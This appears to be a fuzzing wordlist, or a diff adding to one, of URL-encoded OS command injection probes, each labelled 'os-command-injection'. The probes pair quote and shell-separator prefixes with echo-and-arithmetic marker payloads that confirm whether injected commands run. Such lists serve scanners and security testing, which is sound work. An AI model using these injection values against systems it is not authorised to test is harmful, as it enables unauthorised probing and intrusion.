+os-command-injection,'%27%7Cecho%20ENACLF$((45%2B12))$(echo%20ENACLF)ENACLF%2F%2F' +os-command-injection,'%27%7C%7Cecho%20QZICOQ$((45%2B93))$(echo%20QZICOQ)QZICOQ%2F%2F' +os-command-injection,'%27echo%20RQZWBL$((44%2B68))$(echo%20RQZWBL)RQZWBL%26' +os-command-injection,'%27%20echo%20PQOBOJ$((4%2B75))$(echo%20PQOBOJ)PQOBOJ%26' +os-command-injection,'%27;echo%20ZPHRKV$((85%2B32))$(echo%20ZPHRKV)ZPHRKV%26' +os-command-injection,'%27&echo%20PLTXSN$((86%2B55))$(echo%20PLTXSN)PLTXSN%26' +os-command-injection,'%27|echo%20XLWNAZ$((67%2B28))$(echo%20XLWNAZ)XLWNAZ%26' +os-command-injection,'%27||echo%20NCRWHM$((61%2B27))$(echo%20NCRWHM)NCRWHM%26' +os-command-injection,'%27&&echo%20VNSCPP$((62%2B21))$(echo%20VNSCPP)VNSCPP%26' +os-command-injection,'%27%0aecho%20OUPQQD$((2%2B0))$(echo%20OUPQQD)OUPQQD%26' +os-command-injection,'%27%3Becho%20GAJFQI$((99%2B73))$(echo%20GAJFQI)GAJFQI%26' +os-command-injection,'%27%26echo%20TQUBCH$((14%2B97))$(echo%20TQUBCH)TQUBCH%26' +os-command-injection,'%27%26%26echo%20RPLSNW$((41%2B19))$(echo%20RPLSNW)RPLSNW%26' +os-command-injection,'%27%7Cecho%20OYOVQI$((33%2B96))$(echo%20OYOVQI)OYOVQI%26' +os-command-injection,'%27%7C%7Cecho%20IYHEBU$((64%2B26))$(echo%20IYHEBU)IYHEBU%26' +os-command-injection,'%27echo%20KPNQGS$((46%2B86))$(echo%20KPNQGS)KPNQGS%7C' +os-command-injection,'%27%20echo%20WDKUFJ$((39%2B52))$(echo%20WDKUFJ)WDKUFJ%7C' +os-command-injection,'%27;echo%20GFACXP$((32%2B46))$(echo%20GFACXP)GFACXP%7C' +os-command-injection,'%27&echo%20NCNRPJ$((94%2B40))$(echo%20NCNRPJ)NCNRPJ%7C' +os-command-injection,'%27|echo%20KBYQUW$((20%2B94))$(echo%20KBYQUW)KBYQUW%7C' +os-command-injection,'%27||echo%20QQHXIW$((77%2B85))$(echo%20QQHXIW)QQHXIW%7C' +os-command-injection,'%27&&echo%20EFAUWG$((53%2B25))$(echo%20EFAUWG)EFAUWG%7C' +os-command-injection,'%27%0aecho%20UDKFRM$((88%2B90))$(echo%20UDKFRM)UDKFRM%7C' +os-command-injection,'%27%3Becho%20HWICQB$((1%2B54))$(echo%20HWICQB)HWICQB%7C' +os-command-injection,'%27%26echo%20VFLICS$((40%2B73))$(echo%20VFLICS)VFLICS%7C' +os-command-injection,'%27%26%26echo%20VRMOKO$((94%2B14))$(echo%20VRMOKO)VRMOKO%7C' +os-command-injection,'%27%7Cecho%20TRCDFT$((10%2B45))$(echo%20TRCDFT)TRCDFT%7C' +os-command-injection,'%27%7C%7Cecho%20CSRAQS$((36%2B11))$(echo%20CSRAQS)CSRAQS%7C' +os-command-injection,'%22echo%20QDLIQI$((19%2B0))$(echo%20QDLIQI)QDLIQI' +os-command-injection,'%22%20echo%20UUGDBS$((24%2B48))$(echo%20UUGDBS)UUGDBS' +os-command-injection,'%22;echo%20TOQHQO$((39%2B33))$(echo%20TOQHQO)TOQHQO' +os-command-injection,'%22&echo%20RXWHBL$((29%2B57))$(echo%20RXWHBL)RXWHBL' +os-command-injection,'%22|echo%20WXWDDM$((64%2B94))$(echo%20WXWDDM)WXWDDM' +os-command-injection,'%22||echo%20FICECR$((56%2B81))$(echo%20FICECR)FICECR' +os-command-injection,'%22&&echo%20JFXAMU$((71%2B94))$(echo%20JFXAMU)JFXAMU' +os-command-injection,'%22%0aecho%20KVHIKT$((53%2B91))$(echo%20KVHIKT)KVHIKT' +os-command-injection,'%22%3Becho%20EPABXR$((84%2B49))$(echo%20EPABXR)EPABXR' +os-command-injection,'%22%26echo%20KVAPYG$((73%2B0))$(echo%20KVAPYG)KVAPYG' +os-command-injection,'%22%26%26echo%20BCDGJZ$((39%2B25))$(echo%20BCDGJZ)BCDGJZ' +os-command-injection,'%22%7Cecho%20ASWJBG$((45%2B44))$(echo%20ASWJBG)ASWJBG' +os-command-injection,'%22%7C%7Cecho%20TELPMA$((31%2B37))$(echo%20TELPMA)TELPMA' +os-command-injection,'%22echo%20AHKWJA$((95%2B73))$(echo%20AHKWJA)AHKWJA'' +os-command-injection,'%22%20echo%20UKACTN$((51%2B30))$(echo%20UKACTN)UKACTN'' +os-command-injection,'%22;echo%20NGVTGX$((65%2B7))$(echo%20NGVTGX)NGVTGX'' +os-command-injection,'%22&echo%20XGFFNI$((27%2B72))$(echo%20XGFFNI)XGFFNI'' +os-command-injection,'%22|echo%20ZSRBDN$((11%2B21))$(echo%20ZSRBDN)ZSRBDN'' +os-command-injection,'%22||echo%20ASRSJE$((90%2B76))$(echo%20ASRSJE)ASRSJE'' +os-command-injection,'%22&&echo%20RTDEYI$((53%2B46))$(echo%20RTDEYI)RTDEYI'' +os-command-injection,'%22%0aecho%20FPJHYX$((59%2B74))$(echo%20FPJHYX)FPJHYX'' +os-command-injection,'%22%3Becho%20MFPJMQ$((82%2B20))$(echo%20MFPJMQ)MFPJMQ'' +os-command-injection,'%22%26echo%20AIBILK$((43%2B3))$(echo%20AIBILK)AIBILK'' +os-command-injection,'%22%26%26echo%20WHIDLL$((79%2B18))$(echo%20WHIDLL)WHIDLL'' +os-command-injection,'%22%7Cecho%20ZKFRXV$((90%2B79))$(echo%20ZKFRXV)ZKFRXV'' +os-command-injection,'%22%7C%7Cecho%20GRQVVJ$((32%2B82))$(echo%20GRQVVJ)GRQVVJ'' +os-command-injection,'%22echo%20HVUQLV$((68%2B45))$(echo%20HVUQLV)HVUQLV"' +os-command-injection,'%22%20echo%20PPHMUH$((17%2B73))$(echo%20PPHMUH)PPHMUH"' +os-command-injection,'%22;echo%20SQMNBY$((85%2B74))$(echo%20SQMNBY)SQMNBY"' +os-command-injection,'%22&echo%20GVQEOC$((57%2B36))$(echo%20GVQEOC)GVQEOC"' +os-command-injection,'%22|echo%20KIYTJL$((54%2B29))$(echo%20KIYTJL)KIYTJL"' +os-command-injection,'%22||echo%20SYCJEC$((69%2B95))$(echo%20SYCJEC)SYCJEC"' +os-command-injection,'%22&&echo%20EIUCDV$((83%2B99))$(echo%20EIUCDV)EIUCDV"' +os-command-injection,'%22%0aecho%20VFLNZS$((29%2B83))$(echo%20VFLNZS)VFLNZS"' +os-command-injection,'%22%3Becho%20YEWKQB$((93%2B41))$(echo%20YEWKQB)YEWKQB"' +os-command-injection,'%22%26echo%20LYAPEI$((34%2B37))$(echo%20LYAPEI)LYAPEI"' +os-command-injection,'%22%26%26echo%20YPGEMK$((56%2B16))$(echo%20YPGEMK)YPGEMK"' +os-command-injection,'%22%7Cecho%20FBMNPV$((56%2B92))$(echo%20FBMNPV)FBMNPV"' +os-command-injection,'%22%7C%7Cecho%20OBONRE$((91%2B98))$(echo%20OBONRE)OBONRE"' +os-command-injection,'%22echo%20FGEIMA$((19%2B87))$(echo%20FGEIMA)FGEIMA' +os-command-injection,'%22%20echo%20ZNMUAG$((46%2B92))$(echo%20ZNMUAG)ZNMUAG' +os-command-injection,'%22;echo%20GSRLST$((57%2B23))$(echo%20GSRLST)GSRLST' +os-command-injection,'%22&echo%20IRYPDI$((16%2B41))$(echo%20IRYPDI)IRYPDI' +os-command-injection,'%22|echo%20OJFSCA$((98%2B19))$(echo%20OJFSCA)OJFSCA' +os-command-injection,'%22||echo%20BQPBUE$((6%2B80))$(echo%20BQPBUE)BQPBUE' +os-command-injection,'%22&&echo%20MEFVSC$((80%2B28))$(echo%20MEFVSC)MEFVSC' +os-command-injection,'%22%0aecho%20SMCVFB$((37%2B17))$(echo%20SMCVFB)SMCVFB' +os-command-injection,'%22%3Becho%20ZRKJES$((88%2B77))$(echo%20ZRKJES)ZRKJES' +os-command-injection,'%22%26echo%20OJNZQH$((38%2B58))$(echo%20OJNZQH)OJNZQH' +os-command-injection,'%22%26%26echo%20RKEIHR$((8%2B8))$(echo%20RKEIHR)RKEIHR' +os-command-injection,'%22%7Cecho%20YMPBBD$((78%2B0))$(echo%20YMPBBD)YMPBBD' +os-command-injection,'%22%7C%7Cecho%20VYQXWF$((1%2B91))$(echo%20VYQXWF)VYQXWF' +os-command-injection,'%22echo%20KWRCTG$((97%2B95))$(echo%20KWRCTG)KWRCTG//' +os-command-injection,'%22%20echo%20QUEVJY$((66%2B5))$(echo%20QUEVJY)QUEVJY//' +os-command-injection,'%22;echo%20HBUSJP$((41%2B2))$(echo%20HBUSJP)HBUSJP//' +os-command-injection,'%22&echo%20VZHJIZ$((31%2B26))$(echo%20VZHJIZ)VZHJIZ//' +os-command-injection,'%22|echo%20KASCNP$((90%2B75))$(echo%20KASCNP)KASCNP//' +os-command-injection,'%22||echo%20PLTNLH$((0%2B63))$(echo%20PLTNLH)PLTNLH//' +os-command-injection,'%22&&echo%20ZNVIVL$((97%2B19))$(echo%20ZNVIVL)ZNVIVL//' +os-command-injection,'%22%0aecho%20UCUIPY$((4%2B10))$(echo%20UCUIPY)UCUIPY//' +os-command-injection,'%22%3Becho%20BQSCFC$((0%2B98))$(echo%20BQSCFC)BQSCFC//' +os-command-injection,'%22%26echo%20NCSCZB$((35%2B52))$(echo%20NCSCZB)NCSCZB//' +os-command-injection,'%22%26%26echo%20FRTWQZ$((70%2B78))$(echo%20FRTWQZ)FRTWQZ//' +os-command-injection,'%22%7Cecho%20WWSFKA$((8%2B52))$(echo%20WWSFKA)WWSFKA//' +os-command-injection,'%22%7C%7Cecho%20NDQNYQ$((36%2B54))$(echo%20NDQNYQ)NDQNYQ//' +os-command-injection,'%22echo%20DGHRDE$((18%2B48))$(echo%20DGHRDE)DGHRDE\' +os-command-injection,'%22%20echo%20MVAZCZ$((73%2B52))$(echo%20MVAZCZ)MVAZCZ\' +os-command-injection,'%22;echo%20GWGFGD$((21%2B81))$(echo%20GWGFGD)GWGFGD\' +os-command-injection,'%22&echo%20ZYOSSF$((3%2B73))$(echo%20ZYOSSF)ZYOSSF\' +os-command-injection,'%22|echo%20FBXOQL$((67%2B71))$(echo%20FBXOQL)FBXOQL\' +os-command-injection,'%22||echo%20UAVXQP$((39%2B92))$(echo%20UAVXQP)UAVXQP\' +os-command-injection,'%22&&echo%20LJHQDJ$((6%2B56))$(echo%20LJHQDJ)LJHQDJ\' +os-command-injection,'%22%0aecho%20UNYMSO$((48%2B29))$(echo%20UNYMSO)UNYMSO\' +os-command-injection,'%22%3Becho%20IRKBUP$((99%2B87))$(echo%20IRKBUP)IRKBUP\' +os-command-injection,'%22%26echo%20NFZBSQ$((53%2B70))$(echo%20NFZBSQ)NFZBSQ\' +os-command-injection,'%22%26%26echo%20JRKOKH$((41%2B85))$(echo%20JRKOKH)JRKOKH\' +os-command-injection,'%22%7Cecho%20GVEWSC$((69%2B53))$(echo%20GVEWSC)GVEWSC\' +os-command-injection,'%22%7C%7Cecho%20HUGKZQ$((0%2B67))$(echo%20HUGKZQ)HUGKZQ\' +os-command-injection,'%22echo%20XVGLRE$((21%2B97))$(echo%20XVGLRE)XVGLRE&' +os-command-injection,'%22%20echo%20NQIVYI$((0%2B58))$(echo%20NQIVYI)NQIVYI&' +os-command-injection,'%22;echo%20CJTVBA$((23%2B42))$(echo%20CJTVBA)CJTVBA&' +os-command-injection,'%22&echo%20CDFCWV$((36%2B22))$(echo%20CDFCWV)CDFCWV&' +os-command-injection,'%22|echo%20LAHTXU$((26%2B18))$(echo%20LAHTXU)LAHTXU&' +os-command-injection,'%22||echo%20FUOMJK$((92%2B23))$(echo%20FUOMJK)FUOMJK&' +os-command-injection,'%22&&echo%20RVDTRJ$((31%2B86))$(echo%20RVDTRJ)RVDTRJ&' +os-command-injection,'%22%0aecho%20TKPCMK$((80%2B65))$(echo%20TKPCMK)TKPCMK&' +os-command-injection,'%22%3Becho%20IAFRMU$((45%2B79))$(echo%20IAFRMU)IAFRMU&' +os-command-injection,'%22%26echo%20CFMBIF$((28%2B65))$(echo%20CFMBIF)CFMBIF&' +os-command-injection,'%22%26%26echo%20BXSPDI$((19%2B54))$(echo%20BXSPDI)BXSPDI&' +os-command-injection,'%22%7Cecho%20RVSWPE$((20%2B81))$(echo%20RVSWPE)RVSWPE&' +os-command-injection,'%22%7C%7Cecho%20FFTCDY$((19%2B95))$(echo%20FFTCDY)FFTCDY&' +os-command-injection,'%22echo%20WDCBUT$((15%2B76))$(echo%20WDCBUT)WDCBUT|' +os-command-injection,'%22%20echo%20VSICUH$((78%2B75))$(echo%20VSICUH)VSICUH|' +os-command-injection,'%22;echo%20YKMMSL$((26%2B29))$(echo%20YKMMSL)YKMMSL|' +os-command-injection,'%22&echo%20YJBRIM$((70%2B55))$(echo%20YJBRIM)YJBRIM|' +os-command-injection,'%22|echo%20SAQMPN$((71%2B20))$(echo%20SAQMPN)SAQMPN|' +os-command-injection,'%22||echo%20YWODEP$((80%2B41))$(echo%20YWODEP)YWODEP|' +os-command-injection,'%22&&echo%20JGZWWL$((44%2B20))$(echo%20JGZWWL)JGZWWL|' +os-command-injection,'%22%0aecho%20QMZUQP$((97%2B31))$(echo%20QMZUQP)QMZUQP|' +os-command-injection,'%22%3Becho%20MDLILU$((59%2B57))$(echo%20MDLILU)MDLILU|' +os-command-injection,'%22%26echo%20QDNJWL$((73%2B61))$(echo%20QDNJWL)QDNJWL|' +os-command-injection,'%22%26%26echo%20FNCMMT$((70%2B94))$(echo%20FNCMMT)FNCMMT|' +os-command-injection,'%22%7Cecho%20HJHZHR$((26%2B15))$(echo%20HJHZHR)HJHZHR|' +os-command-injection,'%22%7C%7Cecho%20CTPJOY$((58%2B42))$(echo%20CTPJOY)CTPJOY|' +os-command-injection,'%22echo%20COJKHQ$((57%2B48))$(echo%20COJKHQ)COJKHQ%27' +os-command-injection,'%22%20echo%20CMONNY$((1%2B69))$(echo%20CMONNY)CMONNY%27' +os-command-injection,'%22;echo%20IFLGNR$((31%2B89))$(echo%20IFLGNR)IFLGNR%27' +os-command-injection,'%22&echo%20CTSDYA$((54%2B8))$(echo%20CTSDYA)CTSDYA%27' +os-command-injection,'%22|echo%20TIADZA$((14%2B49))$(echo%20TIADZA)TIADZA%27' +os-command-injection,'%22||echo%20CMLPBA$((44%2B89))$(echo%20CMLPBA)CMLPBA%27' +os-command-injection,'%22&&echo%20QZUTVR$((14%2B14))$(echo%20QZUTVR)QZUTVR%27' +os-command-injection,'%22%0aecho%20SVPNNA$((78%2B23))$(echo%20SVPNNA)SVPNNA%27' +os-command-injection,'%22%3Becho%20DVBSPR$((73%2B13))$(echo%20DVBSPR)DVBSPR%27' +os-command-injection,'%22%26echo%20LLWODV$((74%2B52))$(echo%20LLWODV)LLWODV%27' +os-command-injection,'%22%26%26echo%20FXNWMX$((79%2B34))$(echo%20FXNWMX)FXNWMX%27' +os-command-injection,'%22%7Cecho%20LKRAYZ$((79%2B32))$(echo%20LKRAYZ)LKRAYZ%27' +os-command-injection,'%22%7C%7Cecho%20LPSQRE$((76%2B2))$(echo%20LPSQRE)LPSQRE%27' +os-command-injection,'%22echo%20HFMYLX$((51%2B18))$(echo%20HFMYLX)HFMYLX%22' +os-command-injection,'%22%20echo%20RCJQEC$((82%2B64))$(echo%20RCJQEC)RCJQEC%22' +os-command-injection,'%22;echo%20BEQETV$((73%2B10))$(echo%20BEQETV)BEQETV%22' +os-command-injection,'%22&echo%20IRSLRF$((35%2B88))$(echo%20IRSLRF)IRSLRF%22' +os-command-injection,'%22|echo%20IBSIQJ$((92%2B88))$(echo%20IBSIQJ)IBSIQJ%22' +os-command-injection,'%22||echo%20DORIYY$((30%2B85))$(echo%20DORIYY)DORIYY%22' +os-command-injection,'%22&&echo%20GJOLMS$((8%2B3))$(echo%20GJOLMS)GJOLMS%22' +os-command-injection,'%22%0aecho%20OSZJBG$((54%2B26))$(echo%20OSZJBG)OSZJBG%22' +os-command-injection,'%22%3Becho%20BPGUEU$((77%2B5))$(echo%20BPGUEU)BPGUEU%22' +os-command-injection,'%22%26echo%20VGMMDM$((58%2B64))$(echo%20VGMMDM)VGMMDM%22' +os-command-injection,'%22%26%26echo%20QYVLPC$((24%2B55))$(echo%20QYVLPC)QYVLPC%22' +os-command-injection,'%22%7Cecho%20EDEEZB$((20%2B80))$(echo%20EDEEZB)EDEEZB%22' +os-command-injection,'%22%7C%7Cecho%20UJQDXR$((25%2B32))$(echo%20UJQDXR)UJQDXR%22' +os-command-injection,'%22echo%20ZXCMSF$((31%2B27))$(echo%20ZXCMSF)ZXCMSF%5C%5C' +os-command-injection,'%22%20echo%20RWFBCU$((99%2B46))$(echo%20RWFBCU)RWFBCU%5C%5C' +os-command-injection,'%22;echo%20FUCJMY$((75%2B58))$(echo%20FUCJMY)FUCJMY%5C%5C' +os-command-injection,'%22&echo%20QWXPLL$((32%2B57))$(echo%20QWXPLL)QWXPLL%5C%5C' +os-command-injection,'%22|echo%20XZZPRW$((63%2B45))$(echo%20XZZPRW)XZZPRW%5C%5C' +os-command-injection,'%22||echo%20WMJGBT$((73%2B39))$(echo%20WMJGBT)WMJGBT%5C%5C' +os-command-injection,'%22&&echo%20IMYKBH$((59%2B74))$(echo%20IMYKBH)IMYKBH%5C%5C' +os-command-injection,'%22%0aecho%20QSSUKH$((35%2B92))$(echo%20QSSUKH)QSSUKH%5C%5C' +os-command-injection,'%22%3Becho%20LMRJYU$((40%2B49))$(echo%20LMRJYU)LMRJYU%5C%5C' +os-command-injection,'%22%26echo%20IFPLFI$((38%2B60))$(echo%20IFPLFI)IFPLFI%5C%5C' +os-command-injection,'%22%26%26echo%20DAEOVC$((76%2B21))$(echo%20DAEOVC)DAEOVC%5C%5C' +os-command-injection,'%22%7Cecho%20AITHIZ$((84%2B6))$(echo%20AITHIZ)AITHIZ%5C%5C' +os-command-injection,'%22%7C%7Cecho%20IVDYQE$((21%2B54))$(echo%20IVDYQE)IVDYQE%5C%5C' +os-command-injection,'%22echo%20HOFMJC$((68%2B53))$(echo%20HOFMJC)HOFMJC%2F%2F' +os-command-injection,'%22%20echo%20AXZBUQ$((26%2B11))$(echo%20AXZBUQ)AXZBUQ%2F%2F' +os-command-injection,'%22;echo%20JHIVSM$((44%2B64))$(echo%20JHIVSM)JHIVSM%2F%2F' +os-command-injection,'%22&echo%20OWORKI$((87%2B59))$(echo%20OWORKI)OWORKI%2F%2F' +os-command-injection,'%22|echo%20ANEUHZ$((23%2B22))$(echo%20ANEUHZ)ANEUHZ%2F%2F' +os-command-injection,'%22||echo%20XFBOCN$((61%2B25))$(echo%20XFBOCN)XFBOCN%2F%2F' +os-command-injection,'%22&&echo%20YRTLHO$((69%2B19))$(echo%20YRTLHO)YRTLHO%2F%2F' +os-command-injection,'%22%0aecho%20BAVEIJ$((9%2B64))$(echo%20BAVEIJ)BAVEIJ%2F%2F' +os-command-injection,'%22%3Becho%20PZXCGX$((34%2B78))$(echo%20PZXCGX)PZXCGX%2F%2F' +os-command-injection,'%22%26echo%20BLPHOB$((47%2B53))$(echo%20BLPHOB)BLPHOB%2F%2F' +os-command-injection,'%22%26%26echo%20MWFRFW$((14%2B54))$(echo%20MWFRFW)MWFRFW%2F%2F' +os-command-injection,'%22%7Cecho%20LKHTVK$((30%2B54))$(echo%20LKHTVK)LKHTVK%2F%2F' +os-command-injection,'%22%7C%7Cecho%20BGQCNZ$((2%2B66))$(echo%20BGQCNZ)BGQCNZ%2F%2F' +os-command-injection,'%22echo%20ESVBXV$((89%2B66))$(echo%20ESVBXV)ESVBXV%26' +os-command-injection,'%22%20echo%20BNDKEW$((39%2B20))$(echo%20BNDKEW)BNDKEW%26' +os-command-injection,'%22;echo%20BGIYOF$((34%2B50))$(echo%20BGIYOF)BGIYOF%26' +os-command-injection,'%22&echo%20XDIPPG$((33%2B59))$(echo%20XDIPPG)XDIPPG%26' +os-command-injection,'%22|echo%20AJPXDT$((8%2B89))$(echo%20AJPXDT)AJPXDT%26' +os-command-injection,'%22||echo%20JCPPUE$((34%2B90))$(echo%20JCPPUE)JCPPUE%26' +os-command-injection,'%22&&echo%20RFPQXJ$((16%2B75))$(echo%20RFPQXJ)RFPQXJ%26' +os-command-injection,'%22%0aecho%20MZNBQO$((65%2B66))$(echo%20MZNBQO)MZNBQO%26' +os-command-injection,'%22%3Becho%20EQXSGK$((86%2B0))$(echo%20EQXSGK)EQXSGK%26' +os-command-injection,'%22%26echo%20RWYPHC$((46%2B28))$(echo%20RWYPHC)RWYPHC%26' +os-command-injection,'%22%26%26echo%20YIKPNA$((95%2B99))$(echo%20YIKPNA)YIKPNA%26' +os-command-injection,'%22%7Cecho%20FNNAMY$((56%2B18))$(echo%20FNNAMY)FNNAMY%26' +os-command-injection,'%22%7C%7Cecho%20MNEBSX$((23%2B36))$(echo%20MNEBSX)MNEBSX%26' +os-command-injection,'%22echo%20DZXQHG$((20%2B46))$(echo%20DZXQHG)DZXQHG%7C' +os-command-injection,'%22%20echo%20GFNYXZ$((0%2B51))$(echo%20GFNYXZ)GFNYXZ%7C' +os-command-injection,'%22;echo%20TJENJF$((97%2B10))$(echo%20TJENJF)TJENJF%7C' +os-command-injection,'%22&echo%20JKZWSO$((16%2B99))$(echo%20JKZWSO)JKZWSO%7C' +os-command-injection,'%22|echo%20RZKEXB$((2%2B63))$(echo%20RZKEXB)RZKEXB%7C' +os-command-injection,'%22||echo%20EYSOOE$((50%2B13))$(echo%20EYSOOE)EYSOOE%7C' +os-command-injection,'%22&&echo%20KCTHKN$((54%2B70))$(echo%20KCTHKN)KCTHKN%7C' +os-command-injection,'%22%0aecho%20LGFSNB$((46%2B9))$(echo%20LGFSNB)LGFSNB%7C' +os-command-injection,'%22%3Becho%20VPPMSS$((65%2B3))$(echo%20VPPMSS)VPPMSS%7C' +os-command-injection,'%22%26echo%20DKZRJM$((95%2B2))$(echo%20DKZRJM)DKZRJM%7C' +os-command-injection,'%22%26%26echo%20AQMHPO$((37%2B73))$(echo%20AQMHPO)AQMHPO%7C' +os-command-injection,'%22%7Cecho%20SQSPCP$((36%2B68))$(echo%20SQSPCP)SQSPCP%7C' +os-command-injection,'%22%7C%7Cecho%20GJECAG$((89%2B5))$(echo%20GJECAG)GJECAG%7C' +os-command-injection,'%7Cecho%20SZVAMO$((82%2B22))$(echo%20SZVAMO)SZVAMO' +os-command-injection,'%7C%20echo%20QXCOXL$((27%2B5))$(echo%20QXCOXL)QXCOXL' +os-command-injection,';echo%20JPGWRQ$((89%2B36))$(echo%20JPGWRQ)JPGWRQ' +os-command-injection,'&echo%20QPEVFY$((91%2B41))$(echo%20QPEVFY)QPEVFY' +os-command-injection,'|echo%20IXTPRS$((68%2B93))$(echo%20IXTPRS)IXTPRS' +os-command-injection,'||echo%20VEAONC$((56%2B45))$(echo%20VEAONC)VEAONC' +os-command-injection,'&&echo%20NWPTID$((80%2B31))$(echo%20NWPTID)NWPTID' +os-command-injection,'%0aecho%20YBTGCG$((1%2B43))$(echo%20YBTGCG)YBTGCG' +os-command-injection,'%3Becho%20BFFGMX$((91%2B86))$(echo%20BFFGMX)BFFGMX' +os-command-injection,'%26echo%20RYNLFM$((45%2B53))$(echo%20RYNLFM)RYNLFM' +os-command-injection,'%26%26echo%20HKCUQK$((13%2B67))$(echo%20HKCUQK)HKCUQK' +os-command-injection,'%7Cecho%20OSTCOG$((49%2B82))$(echo%20OSTCOG)OSTCOG' +os-command-injection,'%7C%7Cecho%20FZHCCB$((68%2B25))$(echo%20FZHCCB)FZHCCB' +os-command-injection,'echo%20UZYQKP$((76%2B27))$(echo%20UZYQKP)UZYQKP'' +os-command-injection,'%20echo%20OMZNPF$((86%2B96))$(echo%20OMZNPF)OMZNPF'' +os-command-injection,';echo%20YJRHBX$((4%2B25))$(echo%20YJRHBX)YJRHBX'' +os-command-injection,'&echo%20UDYYJG$((66%2B1))$(echo%20UDYYJG)UDYYJG'' +os-command-injection,'|echo%20LPZYWI$((40%2B14))$(echo%20LPZYWI)LPZYWI'' +os-command-injection,'||echo%20DFNHJP$((83%2B52))$(echo%20DFNHJP)DFNHJP'' +os-command-injection,'&&echo%20ANJDXN$((18%2B20))$(echo%20ANJDXN)ANJDXN'' +os-command-injection,'%0aecho%20RQUCHA$((6%2B94))$(echo%20RQUCHA)RQUCHA'' +os-command-injection,'%3Becho%20WJRNPH$((1%2B15))$(echo%20WJRNPH)WJRNPH'' +os-command-injection,'%26echo%20JUDEXC$((97%2B30))$(echo%20JUDEXC)JUDEXC'' +os-command-injection,'%26%26echo%20PGMBBO$((3%2B90))$(echo%20PGMBBO)PGMBBO'' +os-command-injection,'%7Cecho%20MIBCVM$((5%2B17))$(echo%20MIBCVM)MIBCVM'' +os-command-injection,'%7C%7Cecho%20TKWKEV$((96%2B49))$(echo%20TKWKEV)TKWKEV'' +os-command-injection,'echo%20URWVVO$((0%2B4))$(echo%20URWVVO)URWVVO"' +os-command-injection,'%20echo%20PVBSCV$((25%2B60))$(echo%20PVBSCV)PVBSCV"' +os-command-injection,';echo%20VBODDE$((78%2B21))$(echo%20VBODDE)VBODDE"' +os-command-injection,'&echo%20TGYKVF$((42%2B14))$(echo%20TGYKVF)TGYKVF"' +os-command-injection,'|echo%20IQBIEF$((77%2B16))$(echo%20IQBIEF)IQBIEF"' +os-command-injection,'||echo%20THDZZM$((55%2B49))$(echo%20THDZZM)THDZZM"' +os-command-injection,'&&echo%20AJIUPP$((67%2B66))$(echo%20AJIUPP)AJIUPP"' +os-command-injection,'%0aecho%20SUTYKL$((12%2B33))$(echo%20SUTYKL)SUTYKL"' +os-command-injection,'%3Becho%20YLZHIS$((5%2B69))$(echo%20YLZHIS)YLZHIS"' +os-command-injection,'%26echo%20EDHTTZ$((57%2B39))$(echo%20EDHTTZ)EDHTTZ"' +os-command-injection,'%26%26echo%20CLFOGI$((20%2B37))$(echo%20CLFOGI)CLFOGI"' +os-command-injection,'%7Cecho%20CDHGHW$((46%2B6))$(echo%20CDHGHW)CDHGHW"' +os-command-injection,'%7C%7Cecho%20DODCOD$((31%2B91))$(echo%20DODCOD)DODCOD"' +os-command-injection,'echo%20VKRABE$((6%2B96))$(echo%20VKRABE)VKRABE' +os-command-injection,'%20echo%20HLPASS$((48%2B61))$(echo%20HLPASS)HLPASS' +os-command-injection,';echo%20KSVCNW$((0%2B53))$(echo%20KSVCNW)KSVCNW' +os-command-injection,'&echo%20YSZWVH$((93%2B51))$(echo%20YSZWVH)YSZWVH' +os-command-injection,'|echo%20DMMNWK$((14%2B86))$(echo%20DMMNWK)DMMNWK' +os-command-injection,'||echo%20RLINTX$((21%2B20))$(echo%20RLINTX)RLINTX' +os-command-injection,'&&echo%20JXFFUT$((67%2B52))$(echo%20JXFFUT)JXFFUT' +os-command-injection,'%0aecho%20XKMVBL$((16%2B26))$(echo%20XKMVBL)XKMVBL' +os-command-injection,'%3Becho%20JICGBW$((21%2B40))$(echo%20JICGBW)JICGBW' +os-command-injection,'%26echo%20XUKFFI$((79%2B7))$(echo%20XUKFFI)XUKFFI' +os-command-injection,'%26%26echo%20SXYROH$((80%2B44))$(echo%20SXYROH)SXYROH' +os-command-injection,'%7Cecho%20YZLKYH$((87%2B98))$(echo%20YZLKYH)YZLKYH' +os-command-injection,'%7C%7Cecho%20HRETTA$((56%2B9))$(echo%20HRETTA)HRETTA' +os-command-injection,'echo%20UUKZPI$((71%2B35))$(echo%20UUKZPI)UUKZPI//' +os-command-injection,'%20echo%20UNSAJW$((40%2B12))$(echo%20UNSAJW)UNSAJW//' +os-command-injection,';echo%20RDEQIN$((60%2B72))$(echo%20RDEQIN)RDEQIN//' +os-command-injection,'&echo%20KHEGEQ$((46%2B22))$(echo%20KHEGEQ)KHEGEQ//' +os-command-injection,'|echo%20LRPXWZ$((88%2B39))$(echo%20LRPXWZ)LRPXWZ//' +os-command-injection,'||echo%20ZSBSMD$((90%2B5))$(echo%20ZSBSMD)ZSBSMD//' +os-command-injection,'&&echo%20VRZBVN$((80%2B99))$(echo%20VRZBVN)VRZBVN//' +os-command-injection,'%0aecho%20TRSCUU$((6%2B83))$(echo%20TRSCUU)TRSCUU//' +os-command-injection,'%3Becho%20CKMZMV$((11%2B82))$(echo%20CKMZMV)CKMZMV//' +os-command-injection,'%26echo%20GCKMJW$((96%2B51))$(echo%20GCKMJW)GCKMJW//' +os-command-injection,'%26%26echo%20PNMDUS$((34%2B98))$(echo%20PNMDUS)PNMDUS//' +os-command-injection,'%7Cecho%20XUZUDN$((64%2B48))$(echo%20XUZUDN)XUZUDN//' +os-command-injection,'%7C%7Cecho%20GESUGU$((82%2B60))$(echo%20GESUGU)GESUGU//' +os-command-injection,'echo%20MTWKYX$((89%2B57))$(echo%20MTWKYX)MTWKYX\' +os-command-injection,'%20echo%20SBCWOI$((11%2B5))$(echo%20SBCWOI)SBCWOI\' +os-command-injection,';echo%20HLWPGL$((69%2B63))$(echo%20HLWPGL)HLWPGL\' +os-command-injection,'&echo%20DQKWMO$((0%2B96))$(echo%20DQKWMO)DQKWMO\' +os-command-injection,'|echo%20LWFJZZ$((79%2B26))$(echo%20LWFJZZ)LWFJZZ\' +os-command-injection,'||echo%20GIZMTU$((59%2B20))$(echo%20GIZMTU)GIZMTU\' +os-command-injection,'&&echo%20DPKVKY$((97%2B15))$(echo%20DPKVKY)DPKVKY\' +os-command-injection,'%0aecho%20CQEILX$((20%2B83))$(echo%20CQEILX)CQEILX\' +os-command-injection,'%3Becho%20XWLOVV$((27%2B91))$(echo%20XWLOVV)XWLOVV\' +os-command-injection,'%26echo%20GAMOJU$((86%2B49))$(echo%20GAMOJU)GAMOJU\' 